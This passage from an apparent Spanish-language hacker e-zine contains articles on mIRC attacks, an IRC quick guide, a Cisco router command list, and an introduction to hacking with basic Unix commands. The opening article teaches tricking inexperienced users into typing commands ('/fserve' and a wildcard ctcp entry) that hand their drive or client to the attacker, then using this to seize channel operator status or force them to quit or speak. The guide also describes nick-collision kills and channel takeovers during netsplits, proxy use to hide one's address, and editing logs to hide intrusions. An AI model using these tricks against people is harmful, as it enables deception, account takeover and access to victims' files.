los dmsetup.exe que tengas en tu sistema (con la opcion de buscar del menu "inicio" te sera muy facil) y borralos todos,revisa los ficheros "config.sys" y "autoexec.bat" y si tienes dudas sobre alguna linea,sustituye ambos por copias de seguridad. ┐Que no tienes una copia de seguridad?┐pero en que estabas pensando cuando el win2 te dijo que era recomendable hacer un disco de arranque? Luego reinicia el equipo y reinstala el mirc,si sigues sufriendo anomalias a la hora hacer funcionar este programa reinstala el win2 (hazlo encima del que tienes,no hace falta formatear) ATRAVES DE LA LINEA DE COMANDOS. --------------------------------------- Para esto es necesario que usen ingeniaria social con tigo (no te vamos a explicar lo que es la ingenieria social por que es algo sobradamente conocido). Existen una serie de comandos que si los introduces en donde normalmente escribes puedes dejar que el otro controle tu programa del Mirc o que le des acceso a tu c:\ pudiendo hacer los que le venga en gana con el. /fserve su_nick 5 c: /fserve= comando para abrirle una sesion de server al otro usuario su_nick= aqui se pone el nick de la otra persona 5= cantidad de ficheros que puede bajar c:= directorio a partir del que le das acceso Este comando lo que hace es dar acceso completo a tu c:\ (o la carpeta que especifiques) Podra subir,bajar,borrar...ficheros,la unica restriccion que pones es la carpeta apartir de la que tiene acceso,y el numero de archivos que puede bajar. Ademas cuando pones este comando te saldra una ventana (en ingles) diciendote lo que estas haciendo (pero la mayoria de las veces la gente pasa de leerla) ctcp 1:*:$1- Este comando, introducido en los ctcp┤s de mIRC, ejecuta cualkier orden de forma remota.Es como el antiguo /ctpc nick DO. ctcp ==> Client-To-Client-Protocol. Los version, ping, etc... 1 ==> nivel de usuario que ejecuta el ctcp. * ==> como en DOS, comodin que sustituye al ctcp que nos hagan. Podriamos definir aqui un VERSION PING, etc.. $1- ==> con este parametro, mirc toma en consideracion todo lo que nos envien. ┐Mu bonito verdad? pero te estaras preguntando ┐y como coñe se usa? pos mu simple: Hemos conseguido que el pavo introduzca este comando y estamos en el canal #me_mola con el y me apetece que me de OP en este canal,pues ponemos lo siguiente "/ctcp su_nick mode #me_mola +o nuestro_nick" (sin comillas) y bingo,ya tenemos op en el canal #me_mola,pero claro el tio dice "co±o si yo a este no le he dado op" y se mosquea osea que este es un buen momento para hacer un "automass deop" ┐que no sabes como hacerlo? pos en la mayoria de los scripts (un poco modernos) tienes una opcion para hacerlo, "pero esque yo no uso ningun script" ┐pero tu en que mundo vives tio? en http://www.welcome.to/100scripts tienes una coleccion de ellos muy grande,bajate alguno + rapido que inmediatamente :) (si es el ZeD-wOrLd-ScRiPt mejor,jeje) "Bueno pero yo no quiero que me de OP lo que quiero es desconectarle del irc" Bueno pues en ese caso ponlo siguiente: "/ctcp nick_del_personaje quit FRASE QUE TE APETEZCA QUE DIGA AL DESCONECTARSE" (sin las comillas) "┐Y si quiero que diga algo sin que lo escriba?" pues pon esto: "/ctcp nick_del_personaje say FRASE QUE QUIERES QUE DIGA" (sin las comillas) Tienes que tener cuidado con esta clase de "ataques" por que al tio en cuestion se le llenara la ventana de "status" de mensajes diciendole quien sois. Bueno supongo que el concepto lo habreis pillado puesto que es muy simple. Bueno esto es una pequeña muestra de como controlar,colarse...etc... atraves de algo tan usado como es el irc,pero para muchas de estas cosas tienes que elejir a alguien que sea un pardillo en esto del irc,pero los hay,valla si los hay ;) byez -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ─[ IRC (GUIA RAPIDA) - Yo_Soy ]─────────────────────────────────────────────── <─────══════════════════════────> █▓▒░│ I R C │░▒▓█ █▓▒░│ GUIA RAPIDA │░▒▓█ <─────══════════════════════────> IRC es un metodo de conversacion por Internet, sus siglas significan Internet Relay Chat. Esta conversacion se lleva a cabo generalmente mediante un cliente (programa que se conecta a un servidor y mismo que presta un servicio) que se conecta a un servidor , asi nosotros como usuarios utilizamos un apodo (nickname) y llevamos charlas en lugares llamados "canales". C C C C C C C C C C C C │ │ │ │ │ │ │ │ │ │ │ │ ┌──────────┐ ┌──────────┐ ┌──────────┐ │ Servidor │ │ Servidor │ │ Servidor │ │ IRC 2 │───»│ IRC 1 │«───│ IRC 3 │ └──────────┘ └──────────┘ └──────────┘ Existen redes IRC, a los cuales se conecta el programa cliente (C), estas redes estan formadas por varios servidores. De entre los programas clientes destacan el mIRC, virc, etc. ═══════════════════════>[ LOS CANALES ]<═══════════════════════ Es un grupo de uno o mas clientes, el canal es creado por un usuario al entrar por primera vez, y deja de existir cuando el ultimo usuario sale. Si un canal no existe el usuario que lo crea recive los privilegios de operador del canal. Los canales son creados con un nombre el cual se compone de una cadena de caracteres y puede tener una longitud de 200 caracteres, pero no es posible el uso de espacios o comas. ═══════════════════════>[ OPERADORES DEL CANAL ]<══════════════════════ Son los encargados del canal y por tanto tienen privilegios para cambiar las caracteristicas del mismo, los reconoceras facilmente porque veras un @ (arroba) al lado de su nombre. Entre las funciones de un OP estan: Patear a usuarios Colocar un Baneo Un BAN consiste en impedir que el usuario entre al canal. ════════════════════════════>[ SPLIT ]<════════════════════════════ Ocurre cuando en la red se separa 1 o mas servidores entre si. Cuando esto ocurre, en el canal solo quedan los conectados a ese respectivo servidor en los diferentes lados del split. ┌────────────┐ ┌────────────┐ │ SERVIDOR 1 │<════>│ SERVIDOR 2 │ └────────────┘ └────────────┘ Para dar un idea, cuando hay un split los usuarios conectados al servidor 1 ven desconectarse a los usuarios del servidor 2 y los usuarios conectados al servidor 2 ven caer a los del 1. Nosotros podemos aprovechar esto para 2 cosas (tal vez mas ;) : Colision de Nick Ganar OP Despues del NetSplit viene el NetJoin que ocurre cuando el servidor separado se une de nuevo a la red. ═══> Colision de Nick: En el IRC el nickname es unico, por tanto, no pueden existir 2 con el mismo nombre. Si tu tienes el nick de " MENTE ", nadie en toda la red puede usar ese nick. Digamos que el usuario "MENTE" entro a la red IRC por el Servidor 1, asi si hay un split entre el servidor 1 y 2 estos se separan, por tanto "MENTE" deja de existir en el Servidor 2, mas aun sigue conectado, pero unicamente en el Servidor 1. Ahora, supongamos que queremos hacer caer al usuario "MENTE", pero el mendigo esta usando su Firewall y no cae :(.. Creamos un clon y entramos por el Servidor 2 y esperamos.. asi cuando haya un NETJOIN (sucede despues del split cuando se unen los servers) habra una colision (2 personas estan usando el mismo nick) lo que nos trae por consecuencia un KILL a los 2 nicks. ═══> Ganar OP Sucede cuando hay un split entonces nosotros nos lanzamos al servidor que esta separado, creamos el canal que queremos tomar (por lo tanto tendremos op) y esperamos que se vuelva a unir. No siempre funciona porque si el canal que quieres tomar tiene un BOT y esta preparado a la hora de hacer la union, puede que te quite el OP. :(... ════════════════════════════>[ WINGATE ]<═══════════════════════════ Una de las cosas mas vistas en el IRC ahora es ver a personas con una IP diferente a la que deberian tener, pero sin spoofear, esto es utilizando un Wingate, la forma mas sencilla si estamos utilizando mIRC es ir a Setup -> Firewall -> y colocar la IP del Wingate, asi cada vez que entremos a un servidor IRC lo usara como Proxy. Un ejemplo de un Wingate es --> dslc00411.adsl.telusplanet.net En la pagina de RareGaZz encontraras un escaner de Wingates ;) La otra forma de conectarse a Irc por Wingate es: /server ip-wingate 23 /quote irc.server.com 6667 /quote usuario lo_ke_sea lo_ke_sea mail@kesea.com lo_ke_sea /quote nickname lo_ke_sea ══════════════════════>[ Comandos Generales ]<══════════════════════ Cualquier cliente IRC tiene un lugar para introducir lo que vamos a decir , ahi mismo colocaremos los comandos. Los comandos siempre comenzaran con una "/" , aquello que no comience con / se asumira que se trata de un mensaje. ═══> Comandos Basicos /NICK nuevo_nick Cambia tu apodo con el cual seremos conocido en adelante, generalmente tiene una longitud no mayor de 9 caracteres. /LIST Muestra los canales, usuarios y topic de cada uno. /NAMES #canal Muestra los usuarios que estan en cierto canal. /WHOIS nickname Muestra informacion acerca de alguien. /WHOWAS nickname Muestra informacion de alguien que acaba de salir. /UWHO nickname Muesta informacion del usuario. /QUIT mensaje_opcional Sale del IRC, puediendo opcionalmente dejar un mensaje de salida. /SERVER servidor o i.p Se conecta al servidor especificado. ═══> Comandos de Conversacion /JOIN #canal Entra al canal especificado. /LEAVE #canal Sale del canal especificado. /MSG nickname texto Manda un mensaje privado a un usuario. /ME comentario Manda un mensaje al canal con un comentario inciando con tu apodo. /QUERY nickname Comienza una conversacion privada con alguien. /DCC CHAT nickname /DCC CLOSE CHAT nickname Comienza una conversacion directa de cliente a cliente. /DCC SEND nickname path_archivo Manda un archivo a un usuario. /DCC GET nickname Abre la conexion para recivir archivos. /NOTIFY [+/-] nickname Avisa de la prescencia de un usuario en la red. /INVITE nickname #canal Invita a un usuario a entrar a un canal. /IGNORE nickname Ignora a cierto usuario. ═══> Comandos de Mantenimiento del Canal (solo OP's) /TOPIC #canal mensaje de topico Cambia/asigna un mensaje de topico para el canal. /MODE #canal [+|-]modo [nickname] Cambia los modos del canal, entre ellos los siguientes: o - dar/quitar op p - canal privado s - canal secreto i - canal solo para invitados t - solos los op pueden cambiar el topic n - no permite mensajes externos m - canal moderado l - limite de usuarios k - coloca un password al canal v - da/quita voz - permite hablar en un canal moderado b - coloca un baneo /KICK #canal nickname Patea del canal a un usuario. ═══> Otros Comandos /CTCP nick argumento Permite ver algunas caracteristicas del cliente/usuario, entre ellas estan: /CTCP nick PING <══ Manda un Ping /CTCP nick VERSION <══ Ve la version de su cliente. /CTCP nick FINGER <══ Trata de hacer un finger. /PING nickname Manda un Ping a un usuario. /DNS [usuario] Ve la IP y el DNS de un usuario. /WHO cadena Muestra informacion acerca de ciertos usuarios, ej. /who *telmex.net.mx <══ Mostrara los usuarios que tengan esa cadena VOCABULARIO Nickname: Apodo o sobrenombre con el cual somos conocidos en el IRC. K-Line : Es cuando se impide la entrada de un usuario a un servidor. Bot : Robot que se encarga de administrar el canal. Lag : Retardo por la sobrecarga de informacion en IRC. Wingate : Software utilizado para que 2 o mas sistemas utilizen la misma linea, tambien son usados como Proxies. PING : Acronimo de "Packet Internetwork Groper". Se utiliza para probar si la conexion esta activa o inactiva. CTCP : Acronimo de " Client-to-Client Protocol " ( Protocolo de Cliente a Cliente). Scripts : Son aditamentos para nuestro cliente, los mas famosos son para mIRC, si quieres tener una idea de ello, visita la siguiente pagina: http://www.arrakis.es/~alcon/scripts.htm <=Yo-Soy=> varf@bigfoot.com <══════════════> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ─[ Cisco Routers - GuyBrush ]───────────────────────────────────────────────── Aqui teneis una breve descripcion de los comandos del Cisco. Espero que si entrais en alguno, os sirva de algo: COMANDOS DEL CISCO EN MODO NORMAL --------------------------------- <1-99> Session number to resume access-enable Create a temporary Access-List entry clear Reset functions connect Open a terminal connection disable Turn off privileged commands disconnect Disconnect an existing network connection enable Turn on privileged commands exit Exit from the EXEC help Description of the interactive help system lock Lock the terminal login Log in as a particular user logout Exit from the EXEC name-connection Name an existing network connection pad Open a X.29 PAD connection ping Send echo messages ppp Start IETF Point-To-Point Protocol (PPP) resume Resume an active network connection rlogin Open an rlogin connection show Show running system information slip Start Serial-line IP (SLIP) systat Display information about terminal lines telnet Open a telnet connection terminal Set terminal line parameters traceroute Trace route to destination tunnel Open a tunnel connection where List active connections x3 Set X.3 parapeters on PAD COMANDOS DEL CISCO EN MODO PRIVILEGIADO --------------------------------------- <1-99> Session number to resume access-enable Create a temporary Access-List entry access-template Create a temporary Access-List entry bfe For manual emergency modes setting clear Reset functions clock Manage the system clock configure Enter configuration mode connect Open a terminal connection copy Copy configuration or image data debug Debugging functions (see also 'undebug') disable Turn off privileged commands disconnect Disconnect an existing network connection enable Turn on privileged commands erase Erase flash or configuration memory exit Exit from the EXEC help Description of the interactive help system lock Lock the terminal login Log in as a particular user logout Exit from the EXEC name-connection Name an existing network connection no Disable debugging functions pad Open a X.29 PAD connection ping Send echo messages ppp Start IETF Point-to-Point Protocol (PPP) reload Halt and perform a cold restart resume Resume an active network connection rlogin Open an rlogin connection rsh Execute a remote command send Send a message to other tty lines setup Run the SETUP command facility show Show running system information slip Start Serial-line IP (SLIP) start-chat Start a chat-script on a line systat Display information about terminal lines telnet Open a telnet connection terminal Set terminal line parameters test Test subsystems, memory, and interfaces traceroute Trace route to destination tunnel Open a tunnel connection undebug Disable debugging functions (see also 'debug') verify Verify checksum of a Flash file where List active connections write Write running configuration to memory, network, or terminal x3 Set X.3 parameters on PAD PARAMETROS DEL SHOW EN MODO NORMAL ---------------------------------- WORD Flash device information - format <dev:>[partition] clock Display the system clock history Display the session command history hosts IP domain-name, lookup-style, nameservers, and host table isdn ISDN information modemcap Show Modem Capabilities database ppp PPP parameters and statistics sessions Information about Telnet connections snmp snmp statistics terminal Display terminal configuration parameters users Display information about terminal lines version System hardware and software status PARAMETROS DEL SHOW EN MODO PRIVILEGIADO ---------------------------------------- WORD Flash device information - format <dev:>[partition] access-expression List access expression access-lists List access lists accounting Accounting data for active sessions aliases Display alias commands arp ARP table async Information on terminal lines used as router interfaces bridge Bridge Forwarding/Filtering Database [verbose] buffers Buffer pool statistics cdp CDP information clock Display the system clock cmns Connection-Mode networking services (CMNS) information compress Show compression statistics. configuration Contents of Non-Volatile memory controllers Interface controller status debugging State of each debugging option dhcp Dynamic Host Configuration Protocol status dialer Dialer parameters and statistics dnsix Shows Dnsix/DMDP information dxi atm-dxi information entry Queued terminal entries flash System Flash information flh-log Flash Load Helper log buffer frame-relay Frame-Relay information history Display the session command history hosts IP domain-name, lookup style, nameservers, and host table interfaces Interface status and configuration ip IP information isdn ISDN information key Key information line TTY line information llc2 IBM LLC2 circuit information logging Show the contents of logging buffers memory Memory statistics modemcap Show Modem Capabilities database ppp PPP parameters and statistics privilege Show current privilege level processes Active process statistics protocols Active network routing protocols queue Show queue contents queueing Show queueing configuration registry Function registry information reload Scheduled reload information rhosts Remote-host+user equivalences rmon rmon statistics route-map route-map information running-config Current operating configuration sessions Information about Telnet connections smds SMDS information smf Software MAC filter snapshot Snapshot parameters and statistics snmp snmp statistics spanning-tree Spanning tree topology stacks Process stack utilization standby Hot standby protocol information startup-config Contents of startup configuration subsys Show subsystem information tcp Status of TCP connections tech-support Show system information for Tech-Support terminal Display terminal configuration parameters users Display information about terminal lines version System hardware and software status whoami Info on current tty line x25 X.25 information PARAMETROS DEL DEBUG (SOLO PARA MODO PRIVILEGIADO) -------------------------------------------------- aaa AAA Authentication, Authorization and Accounting access-expression Boolean access expression all Enable all debugging arp IP ARP and HP Probe transactions async Async interface information bri-interface bri network interface events broadcast MAC broadcast packets callback Callback activity cdp CDP information chat Chat scripts activity compress COMPRESS traffic confmodem Modem configuration database custom-queue Custom output queueing dhcp DHCP client activity dialer Dial on Demand dnsix Dnsix information domain Domain Name System dxi atm-dxi information eigrp EIGRP Protocol information entry Incoming queue entries ethernet-interface Ethernet network interface events frame-relay Frame Relay ip IP information isdn ISDN information lapb LAPB protocol transactions list Set interface or/and access list for the next debug command llc2 LLC2 type II Information modem Modem control/process activation packet Log unknown packets pad X25 PAD protocol ppp PPP (Point to Point Protocol) information priority Priority output queueing probe HP Probe Proxy Requests radius RADIUS protocol serial Serial interface information smf Software MAC filter snapshot Snapshot activity snmp SNMP information spanning Spanning-tree information standby Hot standby protocol tacacs TACACS authentication and authorization tbridge Transparent Bridging telnet Incoming telnet connections tftp TFTP packets tunnel Generic Tunnel Interface x25 X.25 information Para acceder al Cisco debes hacer telnet y escribir el password correspondiente. Si entras, lo haras en modo normal. Para acceder al modo privilegiado debes poner 'enable' y te pedira otro password. Si lo superas ya estaras en modo privilegiado. Para ver la ayuda de los comandos debes escribir '?'. Si quieres ver la ayuda de un comando en concreto, por ejemplo 'debug', deberas escribir 'debug ?' [ Quiero darle las gracias a Mijail por su gran ayuda en este articulo ] -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ─[ Hack basico - Mr. Aztech / " >< TONE " / John ]──────────────────────────── Ha pasado ya un largo tiempo desde que aparecio la convocatoria en la lista de la rare, para formar un nuevo grupo de newbees, pues ya despues de ponernos de acuerdo y organizarnos, he aqui el primer fruto de nuestro esfuerzo. La intencion de este grupo fue ir aprendiendo mas y mejor, todos unidos como grupo y entregar articulos periodicamente a la Raregazz, originalmente respondieron a mi llamado 13 personas, las cuales fueron aceptadas, pero por motivos fuera de mi control solo quedamos ocho personas, bueno esta es la primera edicion de nuestros articulos, esperemos que les gusten y cualquier aclaracion, duda, comentario, etc. por favor dirijanlas a esta direccion mr_aztech@informaticosmix.com A estaba pasando, tenemos pensado hacerle un guequito a todos los mails de preguntas o aclaraciones que nos lleguen, para responderlos y ponerlos en ediciones posteriores de estos articulos, bueno ahora si vamos a lo que nos truje, gracias a la rare y en especial a GuyBrush, Acidgum y HuiLo por todo el apoyo que dieron para la elaboracion de este articulo (Y un bu!! para Conde Vampiro que ni nos pelo!) Los contenidos que trataremos de abordar seran los siguientes, pero claro explicados perfectamente y sin tecnisismos, o eso se tratara ;-> 1.1 ¿Que es un Hacker? Definicion Mr. Aztech 1.2 Que es y como se maneja un servidor (General) Mr. Aztech 1.3 Comandos Basicos de Unix " >< TONE " 1.4 Que son los Daemons John 1.5 Introduccion a el filtro Vi John *Hasta aqui llega la primera edicion Los contenidos de la segunda edicion vendran luego, pero ya estan confirmados los siguientes temas: 2.1 Permisos de los archivos 2.2 Manual de Filtros Pos como ven hemos hablado de todo menos de hacking, bueno esto es por que primero queremos sentar bien las bases del hacking para luego entrar de lleno en esto, posiblemente se empieze en la tercera edicion. *No se aceptaran mas miembros en el grupo por causas de seguridad interna y nacional Buno ya despues de todo el rollo este, pasamos ya a los primeros articulos, pero recuerden enviarnos todas sus dudas a nuestro correo para resolverselas y publicarlas para todos los que tengan la misma duda. Mr. AZTECh ***************************************************************************** ***************************************************************************** ********************** QUE ES UN HACKER....? ***************************** ********************** POR MR. AZTECh ***************************** ***************************************************************************** ***************************************************************************** Bueno, no voy a explicar demasiado que es un hacker, puesto que si estas buscando informacion hacker es por que se supone que sabes quienes son y que es lo que hacen (Si viste la pelicula Hackers, olvida todo eso y empezemos de nuevo). Un hacker es una persona que tiene un conocimiento elevado sobre sistemas computacionales en general, diganse redes, protocolos de comunicacion, sistemas operativos, comunicaciones, telefonia, etc.. Lo que hacen los hackers es introducirse a sistemas, mediante fallos en la configuracion, pero no con el fin de destrozar el sistema o de sacar provecho de cualquier tipo, el unico provecho que un verdadero hacker puede sacar de los sistemas a los que entra es el de elevar sus conocimientos, las personas que buscan algun provecho al entrar a un sistema, o de plano solo buscan destrozarlo se les conoce como crackers, es por estas peronas que existen leyes contra delitos informaticos, puesto que el hacker busca no dejar huella de su entrada a un sistema, los unicos archivos que un hacker puede modificar son los logs, que son archivos que guardan info. De cada usuario que se conecta a un determinado sistema, pues a grandes rasgos esta es la definicion general de un hacker. Mr. AZTECh ***************************************************************************** ***************************************************************************** ******************* QUE ES UN SERVIDOR ? ************************** ******************* POR MR. AZTECH ************************** ***************************************************************************** ***************************************************************************** Bueno ahora que ya sabemos que es un hacker, debemos saber que es lo que hace; basiente se introduce a sistemas (computadoras) y obtiene superusuario (root) para tener el control total del sistema. Antes de todo debemos definir que es un sistema , un sistema es una computadora que esta o no canectada a una red (internet, LAN, WAN, Intranet, Novel) o a varias redes ( Lo mismo pero de dos a mas), debe tener la capacidad de atender a varios usuarios a la vez (Un sistema puede ser tu PC, conectada a internet pero con un sistema Operativo Multiusuario (Unix, Linux, Windows NT)) y ademas tiene la capacidad de realizar varias tareas a la vez, un ejemplo de sistema es el de una pagina web, puesto que la computadora en que esta guardada la pagina tiene la capacidad de atender a varios usuarios que soliciten esa misma pagina (Si tu vecino esta viendo una pagina, tu la puedes ver en otra PC al mismo tiempo, el servidor atiende a los dos llamados al mismo tiempo.) Las tareas un sistema (servidor) estan divididas por puertos. Por ejemplo el puerto 25 se dedica exclusivamente a enviar mail, esto es comparable al puerto de impresion de tu PC (LTP1) solo que en el caso de servidores, generalmente son porgramas (software) y no hardware como la Smart Drive que se encarga de imprimir en tu PC. Las personas que tienen acceso permitido a un sistema se denominan usuarios, la manera de como un servidor reconoce quien tiene y quien no tiene permitido la entrada a el, es mediante la combinacion de dos palabras, el LOGIN y la CONTRASENA, esta informacion en las maquinas con Unix/Linux es guardada en el archivo /etc/passwd generalmente, aunque varia de version a version. El hacker puede entrar a un sistema basicamente de dos formas, la primera a partir de una combinacion valida de LOGIN y PASSWDORD y la segunada aprovechando errores del sistema operativo o configuracion y ganando acceso sin tener que obtener un LOGIN y PASSWORD. Hasta aqui pareceria facil entrar a algun sistema, pues si conoces a alguien de ese sistema le podrias decir que te mandara el archivo passwd, para tener todos los logins y passwds, pero no es asi por que el sistema de archivos esta protegido con el sistema de encripcion DES, este consiste en que el passwd que se le asigna a un usuario se encrypta con este sistema, y la palabra resultante se le encrypta otras 25 veces con este mismo sistema y a la palabra resultante y a la palabra resultante (mas bien signos) se le agregan dos caracteres mas dependiendo de la fecha y la hora, asi que este proceso es irreversible (ONE-WAY ENCRYPTION ) asi que cuando los usuarios dan su login y password, para entrar a un sistema, este no desencripta la palabra del archivo passwd, sino que la palabra dada por el usuario la encripta y la compara con la archivada. Por ultimo los usuarios de un servidor esta organizados por grupos (grupo financiero, estudiantes, jardineros, etc), en un sistema multiusuario esta claro que debe haber cierta privacidad (si yo hago un doc, no me gustaria que todos lo vieran), los usuarios a su vez se organizan individualmente por su UID y por grupos con la GID mientras este numero sea mayor, mayor sera su poder en el sistema. Asi el usuario Root (Super ususraio) tendra uid 0 o 1. UID=User ID GID=Group ID ######################################################################### ### Comandos Basicos de Unix {{{{{{{{-------}}}}}}}} por ^[]xt0ne[]^ ### ######################################################################### Un sistema operativo es un programa ke se encarga de manejar el hardware y software del PC a beneficio del usuario. Los sistemas operativos fueron diseñados para realizar tareas de hardware repetitivas etc etc etc, creo ke ya han oido mucho de eso pero keria empezar asi =) de lo ke si les hablare antes es de ke es unix y algo de su historia, sera breve. La historia empieza a finales de los 70, momento en ke tuvo lugar un proyecto concertado para desarrollar nuevas tecnicas de sistemas operativos. En 1968 un grupo de investigadores de General Electric, AT&T Bell y del Instituto Tecnologico de Masachussets, realizo un proyecto especial de investigacion de sistemas operativos llamado Multics, Multics incorporo muchos conceptos nuevos de multitarea. En 1969, Ken Thompson de AT&T Bell Laboratories, desarrollo el sistema operativo Unix, incluyendo en el muchas de las caracteristicas del proyecto de investigacion Multics, Thompson adapto el sistema a las nesecidades de un entorno de investigacion diseñandolo para ke se pudiera ejecutar en minicomputadoras. Bueno hay mas de esa historia pero seria muy tedioso relatarla ademas de ke lo ke nos interesa ahora mismo es conocer algunos comandos basicos de Unix, asi ke aca estan los mas importantes: #########################Opciones y argumentos########################## Una opcion es un codigo consistente en una letra precedida por un guion ke modifica la accion ke efectuara la orden ej: ls -l ls visualiza todos los archivos ke hay en el directorio actual la opcion -l modificara su tarea y mostrara un linea de informacion de cada archivo como son el tamaño y la fecha y hora en ke fue por ultima vez modificado ademas de los permisos ke este tiene. Estos son otros argumentos ke se pueden utilizar con ls: -a presenta una lista de los archivos de un directorio incluyendo los archivos ocultos. -F muestra los nombres de directorios precedidos por una barra para una mejor identificacion de estos. -R lista el directorio actual con sus subdirectorios Se pueden hacer combinaciones ls -al etc.... #######################Comandos comunes ######################## ($ o # definen ke tipo de usuario eres si es $ tu status es de usuario si es # eres superusuario o root) ls : lista archivos ej = $ ls nombre_archivo cp : copia archivos ej = $ cp nombre_archivo /home/user (donde /home/user son el directorio y subdirectorio respectivamente ) ( en el cual sera copiado el archivo ) rm : borra archivos ej = $ rm nombre_archivo mv : sirve para mover o renombrar archivos ej = $mv nombre_archivo /home/user (eso en caso de mover el archivo a el directorio rekerido) ej = $mv nombre_archivo 2nombre_archivo (esto en caso de kerer renombrar el archivo) cd : igual ke en DOS permite acceder a un directorio ej = $ cd nombre_directorio mkdir : crea un directorio ej = $mkdir nombre_directorio rmdir : elimina un directorio ej = $rmdir nombre_directorio cat : filtro utilizado para mostrar el contenido de archivos ej = $cat /home/user/nombre_archivo more : visualiza un archivo pantalla por pantalla ej = $more nombre_archivo pwd : presenta el nombre de via completo del directorio en ke te encuentras ej = $ pwd /home/user $_ find : permite efectuar una buskeda de archivos ej = $ find nombre_archivo (esto busca el archivo en el directorio actual) ej = $ find nombre_archivo / (buscar el archivo en todo el disco duro) #################Operaciones de administracion de archivos ################ Unix proporciona varias utilidades para el manejo de sus archivos y directorios, tambien puede controlar el acceso a sus archivos, cada archivo de unix tiene definido una serie de permisos ke determinan kienes tiene acceso a el, asi como el tipo de acceso ke puedan tener. Como ya dijimos antes ls -l nos permita visualizar los permisos de determinado archivo o directorio con el comando chmod podemos modificar esos permisos. ej = $ ls -l datos -rw-r--r-x 1 juan wheater 207 Feb 15 11:30 datos || | | | | | || | | | | | tipo |de archivo | | nombre del ar|chivo en b|ytes | | | | | permisos nombre de| due±o | nombre del archivo | fecha y hora de la ultima actualizacion nombre del grupo En ese ejemplo vemos los datos de un archivo en caso de ke datos fuera un directorio su tipo seria d y se veria drw-r--r-x. Los permisos se dividen como ya vimos en 10 casillas de las cuales la primera indica si es un archivo o si es un directorio las tres siguiente ekivalen a los permisos del dueño del archivo o directorio las tres ke siguen equivalen a los permisos del grupo y las tres ultimas a los permisos de los demas usuarios Asi estan distribuidos los permisos : del dueño del grupo de otros rwx rwx rwx rw- rw- r-- donde r equivale al permiso de lectura w permiso de escritura x permiso de ejecucion Estos permisos pueden ser modificados utilizando la orden chmod , para su uso se han especificado las categorias de cada usuarios asi: u para el dueño, g para el grupo y o para otros usuarios. ej = $chmod g+rw datos (esto le añade permisos de escritura y lectura a datos para el grupo) ej = $chmod o-x datos (en este caso se le kita el permiso de ejecucion a los otros usuarios del archivo datos) ej = $chmod u+r-wx (aqui se le da permiso de lectura al dueño pero de igual modo se le kitan los permisos de lectura y escritura) ej = $chmod a+r (este le da permiso de lectura a todos tanto a el dueño como al grupo y a los demas usuarios) ej = $chmod +r (hace lo mismo ke la anterior le da el permiso de lectura a todos) Como ves se puede jugar con los permisos es simplemente cuestion de hacer combinaciones y usar la imaginacion, se pueden tambien modificar los permisos de un directorio simplemente se especifica al final el nombre del directorio. Bueno por ahora la dejo alli mas adelante se profundisara con los permisos, hablando de los permisos absolutos. ~~~~~~~~~~~~~~~~~~~ DAEMONS Y DRAGONES ~~~~~~~~~~~~~~~~~~~ Los demonios son procesos que no estan conectados a un terminal; pueden ejecutarse en modo subordinado y realizan trabajo util. El integrador de impresion es un ejemplo de DAEMON, es decir, un programa que se ejecuta en el plano secundario y que proporciona un servicio de interes general. Unix posee cierto numero de programas de este tipo. Algunos daemons arrancan de manera automatica cuando alguien inicializa el sistema, y siempre estan disponibles. Otros permanecen inactivos la mayor parte del tiempo, despertando a intervalos predefinidos o en respuesta a algun SUCESO. Los daemons ejecutan todo tipo de funciones para lograr que el sistema opere optimamente: manejan la memoria, controlan los trabajos de impresion, envian y reciben correo, ejecutan comandos en tiempos especificos, responden a peticiones remotas con finger, etcetera. El daemon integrador de la impresion se llama lpd. El daemon de finger se llama fingerd. El daemon mas comun es sendmail. Las comunicaciones del sistema UNIX a traves de uucp implican a varios demonios: uucico maneja la planificacion y administracion de los trabajos uucp, comprobando si existe algun trabajo para ejecutar, seleccionando un dispositivo, estableciendo la conexion, ejecutando el trabajo y actualizando el archivo de registro; uuxqt controla la ejecucion remota de ordenes. Demonios similares manejan la impresion y el funcionamiento del spool de impresora, la copia de seguridad de archivos. la limpieza de directorios temporales y las operaciones de facturacion. Cada uno de estos demonios esta controlado por cron, que es asimismo ejecutado por init (PID 1). *--------------------------------------------------------------------------* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Que significa ... Daemons, dragones ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Aunque el nombre se pronuncia 'dii-mon', la forma correcta de escritura es daemon. No se sabe si el ser un acronimo o por que existe una variante de su escritura en Inglaterra. (En la mitologia Celta, un daemon es, por lo general, un espiritu o inspiracion, bueno o neutral. Sin embargo, un Demon [demonio en español] siempre es una entidad maligna.) Tal vez usted lea en alguna parte que el nombre significa "monitor de disco y ejecucion" (Disk and Executing Monitor), termino derivado de las antiguas computadoras DEC 10 y 20. Sin embargo esta explicacion se formulo despues del hecho. Los programadores del MIT (Massachusetts Institute of Technology) que trabajaron en CTSS (Sistema Compatible de Tiempo Compartido, El CTSS tenia una libreria llamada "runcom"", que ejecutaba una lista de comandos almacenados en un archivo), desarrollado en 1963 usaron primero el nombre Daemon. Los acuñaron para lo que otros programadores denominaron DRAGONES (cabe señalar que estos trabajaban en el ITS [Sistema Incompatible de Tiempo Compartido]). CTSS e ITS son ancestros de Unix. ITS fue un sistema operativo importante, aunque extraño, con un sequito de adoradores en el MIT. 